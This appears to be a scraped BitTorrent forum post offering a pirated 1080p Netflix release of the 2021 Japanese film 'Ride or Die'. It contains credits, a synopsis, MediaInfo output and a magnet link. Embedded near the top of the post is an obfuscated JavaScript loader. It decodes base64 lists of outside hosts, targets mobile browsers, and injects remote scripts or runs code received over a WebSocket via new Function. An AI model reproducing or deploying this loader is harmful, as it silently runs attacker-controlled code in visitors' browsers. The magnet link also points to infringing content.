彼女[中文字幕].Ride.or.Die.2021.Netflix.WEB-DL.1080p.x264.DDP5.1.Atmos 8.62GB

版主小s 23天前 1489

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 她 / Ride or Die

◎片 名 彼女

◎年 代 2021

◎产 地 日本

◎类 别 剧情 / 爱情 / 同性 / 犯罪

◎语 言 日语

◎上映日期 2021-04-15(日本网络)

◎IMDb链接 https://www.imdb.com/title/tt14164234/

◎豆瓣评分 5.5/10 (5134人评价)

◎豆瓣链接 https://movie.douban.com/subject/35234308/

◎片 长 142分钟

◎导 演 广木隆一 Ryuichi Hiroki (id:1286685)

◎编 剧 吉川菜美 Nami Yoshikawa (id:1372634)

中村珍 Ching Nakamura (id:1455762)

◎演 员 水原希子 Kiko Mizuhara (id:1275762)

佐藤穗奈美 Honami Sato (id:1442930)

新纳慎也 Shinya NIRO (id:1386430)

田中俊介 Shunsuke Tanaka (id:1372590)

乌丸节子 Setsuko Karasuma (id:1007478)

南沙良 Sara Minami (id:1378935)

铃木杏 Anne Suzuki (id:1045413)

田中哲司 Tetsushi Tanaka (id:1313629)

真木阳子 Yoko Maki (id:1028094)

植村友结 Yui Uemura (id:1455761)

◎标 签 同性 / 水原希子 / 日本 / LGBT / 日本电影 / 爱情 / 2021 / 日本電影

◎简 介

影片原作是中村珍所著的女同漫画《群青》,讲述永泽和篠田两个女性之间的爱恨纠葛——永泽从高中时代起就爱慕着篠田,篠田在结婚后受到丈夫的家暴,一句“你帮我把他杀了吧”,让永泽成为了杀人犯。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 337292037235777713261845325938571131396 (0xFDC0155D151D3A6F0D9AC832F588BA04)

  4. Complete name : [email protected]QDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.62 GiB

  8. Duration : 2 h 22 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 8 632 kb/s

  11. Encoded date : UTC 2021-09-21 13:22:31

  12. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 4 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 4 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 2 h 22 min

  24. Bit rate mode : Variable

  25. Bit rate : 5 299 kb/s

  26. Maximum bit rate : 20.0 Mb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 23.976 (24000/1001/53354) FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.107

  37. Stream size : 5.29 GiB (61%)

  38. Writing library : x264 core 148 r2722 1b0121b

  39. Encoding settings : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=16.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3 JOC

  45. Format/Info : Enhanced AC-3 with Joint Object Coding

  46. Commercial name : Dolby Digital Plus with Dolby Atmos

  47. Codec ID : A_EAC3

  48. Duration : 2 h 22 min

  49. Bit rate mode : Constant

  50. Bit rate : 768 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Delay relative to video : -83 ms

  57. Stream size : 785 MiB (9%)

  58. Title : 日本語

  59. Language : Japanese

  60. Service kind : Complete Main

  61. Default : Yes

  62. Forced : No

  63. Complexity index : 16

  64. Number of dynamic objects : 15

  65. Bed channel count : 1 channel

  66. Bed channel configuration : LFE


  67. Audio #2

  68. ID : 3

  69. Format : E-AC-3

  70. Format/Info : Enhanced AC-3

  71. Commercial name : Dolby Digital Plus

  72. Codec ID : A_EAC3

  73. Duration : 2 h 22 min

  74. Bit rate mode : Constant

  75. Bit rate : 640 kb/s

  76. Channel(s) : 6 channels

  77. Channel layout : L R C LFE Ls Rs

  78. Sampling rate : 48.0 kHz

  79. Frame rate : 31.250 FPS (1536 SPF)

  80. Compression mode : Lossy

  81. Delay relative to video : -83 ms

  82. Stream size : 654 MiB (7%)

  83. Title : English

  84. Language : English

  85. Service kind : Complete Main

  86. Default : Yes

  87. Forced : No


  88. Audio #3

  89. ID : 4

  90. Format : E-AC-3

  91. Format/Info : Enhanced AC-3

  92. Commercial name : Dolby Digital Plus

  93. Codec ID : A_EAC3

  94. Duration : 2 h 22 min

  95. Bit rate mode : Constant

  96. Bit rate : 640 kb/s

  97. Channel(s) : 6 channels

  98. Channel layout : L R C LFE Ls Rs

  99. Sampling rate : 48.0 kHz

  100. Frame rate : 31.250 FPS (1536 SPF)

  101. Compression mode : Lossy

  102. Delay relative to video : -83 ms

  103. Stream size : 654 MiB (7%)

  104. Title : Espa?ol

  105. Language : Spanish

  106. Service kind : Complete Main

  107. Default : Yes

  108. Forced : No


  109. Audio #4

  110. ID : 5

  111. Format : E-AC-3

  112. Format/Info : Enhanced AC-3

  113. Commercial name : Dolby Digital Plus

  114. Codec ID : A_EAC3

  115. Duration : 2 h 22 min

  116. Bit rate mode : Constant

  117. Bit rate : 640 kb/s

  118. Channel(s) : 6 channels

  119. Channel layout : L R C LFE Ls Rs

  120. Sampling rate : 48.0 kHz

  121. Frame rate : 31.250 FPS (1536 SPF)

  122. Compression mode : Lossy

  123. Delay relative to video : -83 ms

  124. Stream size : 654 MiB (7%)

  125. Title : Brasileiro

  126. Language : Portuguese

  127. Service kind : Complete Main

  128. Default : Yes

  129. Forced : No


  130. Audio #5

  131. ID : 6

  132. Format : E-AC-3

  133. Format/Info : Enhanced AC-3

  134. Commercial name : Dolby Digital Plus

  135. Codec ID : A_EAC3

  136. Duration : 2 h 22 min

  137. Bit rate mode : Constant

  138. Bit rate : 640 kb/s

  139. Channel(s) : 6 channels

  140. Channel layout : L R C LFE Ls Rs

  141. Sampling rate : 48.0 kHz

  142. Frame rate : 31.250 FPS (1536 SPF)

  143. Compression mode : Lossy

  144. Delay relative to video : -83 ms

  145. Stream size : 654 MiB (7%)

  146. Title : ???????

  147. Language : Thai

  148. Service kind : Complete Main

  149. Default : Yes

  150. Forced : No


  151. Text #1

  152. ID : 7

  153. Format : UTF-8

  154. Codec ID : S_TEXT/UTF8

  155. Codec ID/Info : UTF-8 Plain Text

  156. Duration : 2 h 22 min

  157. Bit rate : 34 b/s

  158. Count of elements : 955

  159. Stream size : 35.8 KiB (0%)

  160. Title : ???????

  161. Language : Arabic

  162. Default : Yes

  163. Forced : No


  164. Text #2

  165. ID : 8

  166. Format : UTF-8

  167. Codec ID : S_TEXT/UTF8

  168. Codec ID/Info : UTF-8 Plain Text

  169. Duration : 2 h 22 min

  170. Bit rate : 22 b/s

  171. Count of elements : 955

  172. Stream size : 23.1 KiB (0%)

  173. Title : ?e?tina

  174. Language : Czech

  175. Default : Yes

  176. Forced : No


  177. Text #3

  178. ID : 9

  179. Format : UTF-8

  180. Codec ID : S_TEXT/UTF8

  181. Codec ID/Info : UTF-8 Plain Text

  182. Duration : 2 h 22 min

  183. Bit rate : 23 b/s

  184. Count of elements : 955

  185. Stream size : 24.1 KiB (0%)

  186. Title : Dansk

  187. Language : Danish

  188. Default : Yes

  189. Forced : No


  190. Text #4

  191. ID : 10

  192. Format : UTF-8

  193. Codec ID : S_TEXT/UTF8

  194. Codec ID/Info : UTF-8 Plain Text

  195. Duration : 2 h 22 min

  196. Bit rate : 25 b/s

  197. Count of elements : 955

  198. Stream size : 26.4 KiB (0%)

  199. Title : Deutsch

  200. Language : German

  201. Default : Yes

  202. Forced : No


  203. Text #5

  204. ID : 11

  205. Format : UTF-8

  206. Codec ID : S_TEXT/UTF8

  207. Codec ID/Info : UTF-8 Plain Text

  208. Duration : 2 h 22 min

  209. Bit rate : 37 b/s

  210. Count of elements : 955

  211. Stream size : 38.6 KiB (0%)

  212. Title : Ελληνικ?

  213. Language : Greek

  214. Default : Yes

  215. Forced : No


  216. Text #6

  217. ID : 12

  218. Format : UTF-8

  219. Codec ID : S_TEXT/UTF8

  220. Codec ID/Info : UTF-8 Plain Text

  221. Duration : 2 h 21 min

  222. Bit rate : 23 b/s

  223. Count of elements : 953

  224. Stream size : 24.2 KiB (0%)

  225. Title : English

  226. Language : English

  227. Default : Yes

  228. Forced : No


  229. Text #7

  230. ID : 13

  231. Format : UTF-8

  232. Codec ID : S_TEXT/UTF8

  233. Codec ID/Info : UTF-8 Plain Text

  234. Duration : 2 h 22 min

  235. Bit rate : 21 b/s

  236. Count of elements : 948

  237. Stream size : 22.6 KiB (0%)

  238. Title : Espa?ol

  239. Language : Spanish

  240. Default : Yes

  241. Forced : No


  242. Text #8

  243. ID : 14

  244. Format : UTF-8

  245. Codec ID : S_TEXT/UTF8

  246. Codec ID/Info : UTF-8 Plain Text

  247. Duration : 2 h 22 min

  248. Bit rate : 22 b/s

  249. Count of elements : 955

  250. Stream size : 23.5 KiB (0%)

  251. Title : Europa?Espa?ol

  252. Language : Spanish

  253. Default : Yes

  254. Forced : No


  255. Text #9

  256. ID : 15

  257. Format : UTF-8

  258. Codec ID : S_TEXT/UTF8

  259. Codec ID/Info : UTF-8 Plain Text

  260. Duration : 2 h 22 min

  261. Bit rate : 22 b/s

  262. Count of elements : 955

  263. Stream size : 23.9 KiB (0%)

  264. Title : Suomi

  265. Language : Finnish

  266. Default : Yes

  267. Forced : No


  268. Text #10

  269. ID : 16

  270. Format : UTF-8

  271. Codec ID : S_TEXT/UTF8

  272. Codec ID/Info : UTF-8 Plain Text

  273. Duration : 2 h 22 min

  274. Bit rate : 24 b/s

  275. Count of elements : 952

  276. Stream size : 25.8 KiB (0%)

  277. Title : Fran?ais

  278. Language : French

  279. Default : Yes

  280. Forced : No


  281. Text #11

  282. ID : 17

  283. Format : UTF-8

  284. Codec ID : S_TEXT/UTF8

  285. Codec ID/Info : UTF-8 Plain Text

  286. Duration : 2 h 22 min

  287. Bit rate : 30 b/s

  288. Count of elements : 955

  289. Stream size : 32.3 KiB (0%)

  290. Title : ?????

  291. Language : Hebrew

  292. Default : Yes

  293. Forced : No


  294. Text #12

  295. ID : 18

  296. Format : UTF-8

  297. Codec ID : S_TEXT/UTF8

  298. Codec ID/Info : UTF-8 Plain Text

  299. Duration : 2 h 22 min

  300. Bit rate : 21 b/s

  301. Count of elements : 955

  302. Stream size : 22.8 KiB (0%)

  303. Title : Hrvatski

  304. Language : Croatian

  305. Default : Yes

  306. Forced : No


  307. Text #13

  308. ID : 19

  309. Format : UTF-8

  310. Codec ID : S_TEXT/UTF8

  311. Codec ID/Info : UTF-8 Plain Text

  312. Duration : 2 h 22 min

  313. Bit rate : 21 b/s

  314. Count of elements : 952

  315. Stream size : 22.6 KiB (0%)

  316. Title : Magyar

  317. Language : Hungarian

  318. Default : Yes

  319. Forced : No


  320. Text #14

  321. ID : 20

  322. Format : UTF-8

  323. Codec ID : S_TEXT/UTF8

  324. Codec ID/Info : UTF-8 Plain Text

  325. Duration : 2 h 22 min

  326. Bit rate : 23 b/s

  327. Count of elements : 955

  328. Stream size : 24.1 KiB (0%)

  329. Title : Indonesian

  330. Language : Indonesian

  331. Default : Yes

  332. Forced : No


  333. Text #15

  334. ID : 21

  335. Format : UTF-8

  336. Codec ID : S_TEXT/UTF8

  337. Codec ID/Info : UTF-8 Plain Text

  338. Duration : 2 h 22 min

  339. Bit rate : 22 b/s

  340. Count of elements : 954

  341. Stream size : 23.2 KiB (0%)

  342. Title : Italian

  343. Language : Italian

  344. Default : Yes

  345. Forced : No


  346. Text #16

  347. ID : 22

  348. Format : UTF-8

  349. Codec ID : S_TEXT/UTF8

  350. Codec ID/Info : UTF-8 Plain Text

  351. Duration : 2 h 22 min

  352. Bit rate : 60 b/s

  353. Count of elements : 1105

  354. Stream size : 63.1 KiB (0%)

  355. Title : 日本語 (SDH)

  356. Language : Japanese

  357. Default : Yes

  358. Forced : No


  359. Text #17

  360. ID : 23

  361. Format : UTF-8

  362. Codec ID : S_TEXT/UTF8

  363. Codec ID/Info : UTF-8 Plain Text

  364. Duration : 2 h 22 min

  365. Bit rate : 25 b/s

  366. Count of elements : 940

  367. Stream size : 26.0 KiB (0%)

  368. Title : ???

  369. Language : Korean

  370. Default : Yes

  371. Forced : No


  372. Text #18

  373. ID : 24

  374. Format : UTF-8

  375. Codec ID : S_TEXT/UTF8

  376. Codec ID/Info : UTF-8 Plain Text

  377. Duration : 2 h 22 min

  378. Bit rate : 24 b/s

  379. Count of elements : 955

  380. Stream size : 25.6 KiB (0%)

  381. Title : Malaysia

  382. Language : Malay

  383. Default : Yes

  384. Forced : No


  385. Text #19

  386. ID : 25

  387. Format : UTF-8

  388. Codec ID : S_TEXT/UTF8

  389. Codec ID/Info : UTF-8 Plain Text

  390. Duration : 2 h 22 min

  391. Bit rate : 22 b/s

  392. Count of elements : 955

  393. Stream size : 23.4 KiB (0%)

  394. Title : Norsk Bokm?l

  395. Language : Norwegian Bokmal

  396. Default : Yes

  397. Forced : No


  398. Text #20

  399. ID : 26

  400. Format : UTF-8

  401. Codec ID : S_TEXT/UTF8

  402. Codec ID/Info : UTF-8 Plain Text

  403. Duration : 2 h 22 min

  404. Bit rate : 22 b/s

  405. Count of elements : 950

  406. Stream size : 23.0 KiB (0%)

  407. Title : Nederlands

  408. Language : Dutch

  409. Default : Yes

  410. Forced : No


  411. Text #21

  412. ID : 27

  413. Format : UTF-8

  414. Codec ID : S_TEXT/UTF8

  415. Codec ID/Info : UTF-8 Plain Text

  416. Duration : 2 h 22 min

  417. Bit rate : 22 b/s

  418. Count of elements : 955

  419. Stream size : 23.9 KiB (0%)

  420. Title : Polski

  421. Language : Polish

  422. Default : Yes

  423. Forced : No


  424. Text #22

  425. ID : 28

  426. Format : UTF-8

  427. Codec ID : S_TEXT/UTF8

  428. Codec ID/Info : UTF-8 Plain Text

  429. Duration : 2 h 22 min

  430. Bit rate : 21 b/s

  431. Count of elements : 954

  432. Stream size : 22.5 KiB (0%)

  433. Title : Português

  434. Language : Portuguese

  435. Default : Yes

  436. Forced : No


  437. Text #23

  438. ID : 29

  439. Format : UTF-8

  440. Codec ID : S_TEXT/UTF8

  441. Codec ID/Info : UTF-8 Plain Text

  442. Duration : 2 h 22 min

  443. Bit rate : 22 b/s

  444. Count of elements : 943

  445. Stream size : 23.8 KiB (0%)

  446. Title : Brasileiro Português

  447. Language : Portuguese

  448. Default : Yes

  449. Forced : No


  450. Text #24

  451. ID : 30

  452. Format : UTF-8

  453. Codec ID : S_TEXT/UTF8

  454. Codec ID/Info : UTF-8 Plain Text

  455. Duration : 2 h 22 min

  456. Bit rate : 23 b/s

  457. Count of elements : 955

  458. Stream size : 24.1 KiB (0%)

  459. Title : Roman?

  460. Language : Romanian

  461. Default : Yes

  462. Forced : No


  463. Text #25

  464. ID : 31

  465. Format : UTF-8

  466. Codec ID : S_TEXT/UTF8

  467. Codec ID/Info : UTF-8 Plain Text

  468. Duration : 2 h 22 min

  469. Bit rate : 38 b/s

  470. Count of elements : 955

  471. Stream size : 40.6 KiB (0%)

  472. Title : русский язык

  473. Language : Russian

  474. Default : Yes

  475. Forced : No


  476. Text #26

  477. ID : 32

  478. Format : UTF-8

  479. Codec ID : S_TEXT/UTF8

  480. Codec ID/Info : UTF-8 Plain Text

  481. Duration : 2 h 22 min

  482. Bit rate : 22 b/s

  483. Count of elements : 955

  484. Stream size : 23.8 KiB (0%)

  485. Title : Svenska

  486. Language : Swedish

  487. Default : Yes

  488. Forced : No


  489. Text #27

  490. ID : 33

  491. Format : UTF-8

  492. Codec ID : S_TEXT/UTF8

  493. Codec ID/Info : UTF-8 Plain Text

  494. Duration : 2 h 22 min

  495. Bit rate : 55 b/s

  496. Count of elements : 955

  497. Stream size : 58.2 KiB (0%)

  498. Title : ???????

  499. Language : Thai

  500. Default : Yes

  501. Forced : No


  502. Text #28

  503. ID : 34

  504. Format : UTF-8

  505. Codec ID : S_TEXT/UTF8

  506. Codec ID/Info : UTF-8 Plain Text

  507. Duration : 2 h 22 min

  508. Bit rate : 23 b/s

  509. Count of elements : 955

  510. Stream size : 24.0 KiB (0%)

  511. Title : Türk?e

  512. Language : Turkish

  513. Default : Yes

  514. Forced : No


  515. Text #29

  516. ID : 35

  517. Format : UTF-8

  518. Codec ID : S_TEXT/UTF8

  519. Codec ID/Info : UTF-8 Plain Text

  520. Duration : 2 h 22 min

  521. Bit rate : 34 b/s

  522. Count of elements : 950

  523. Stream size : 35.6 KiB (0%)

  524. Title : Укра?нська

  525. Language : Ukrainian

  526. Default : Yes

  527. Forced : No


  528. Text #30

  529. ID : 36

  530. Format : UTF-8

  531. Codec ID : S_TEXT/UTF8

  532. Codec ID/Info : UTF-8 Plain Text

  533. Duration : 2 h 22 min

  534. Bit rate : 30 b/s

  535. Count of elements : 955

  536. Stream size : 31.7 KiB (0%)

  537. Title : Ti?ng Vi?t

  538. Language : Vietnamese

  539. Default : Yes

  540. Forced : No


  541. Text #31

  542. ID : 37

  543. Format : UTF-8

  544. Codec ID : S_TEXT/UTF8

  545. Codec ID/Info : UTF-8 Plain Text

  546. Duration : 2 h 22 min

  547. Bit rate : 21 b/s

  548. Count of elements : 965

  549. Stream size : 22.2 KiB (0%)

  550. Title : 中文(简体)

  551. Language : Chinese

  552. Default : Yes

  553. Forced : No


  554. Text #32

  555. ID : 38

  556. Format : UTF-8

  557. Codec ID : S_TEXT/UTF8

  558. Codec ID/Info : UTF-8 Plain Text

  559. Duration : 2 h 22 min

  560. Bit rate : 21 b/s

  561. Count of elements : 957

  562. Stream size : 22.2 KiB (0%)

  563. Title : 中文(繁體)

  564. Language : Chinese

  565. Default : Yes

  566. Forced : No


TAGS 剧情 犯罪 爱情 同性

磁力链:
  • magnet:?xl=26894&xt=urn:btih:68C2DA3A2A5FBE57EE9CCE423C2A220454773963
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回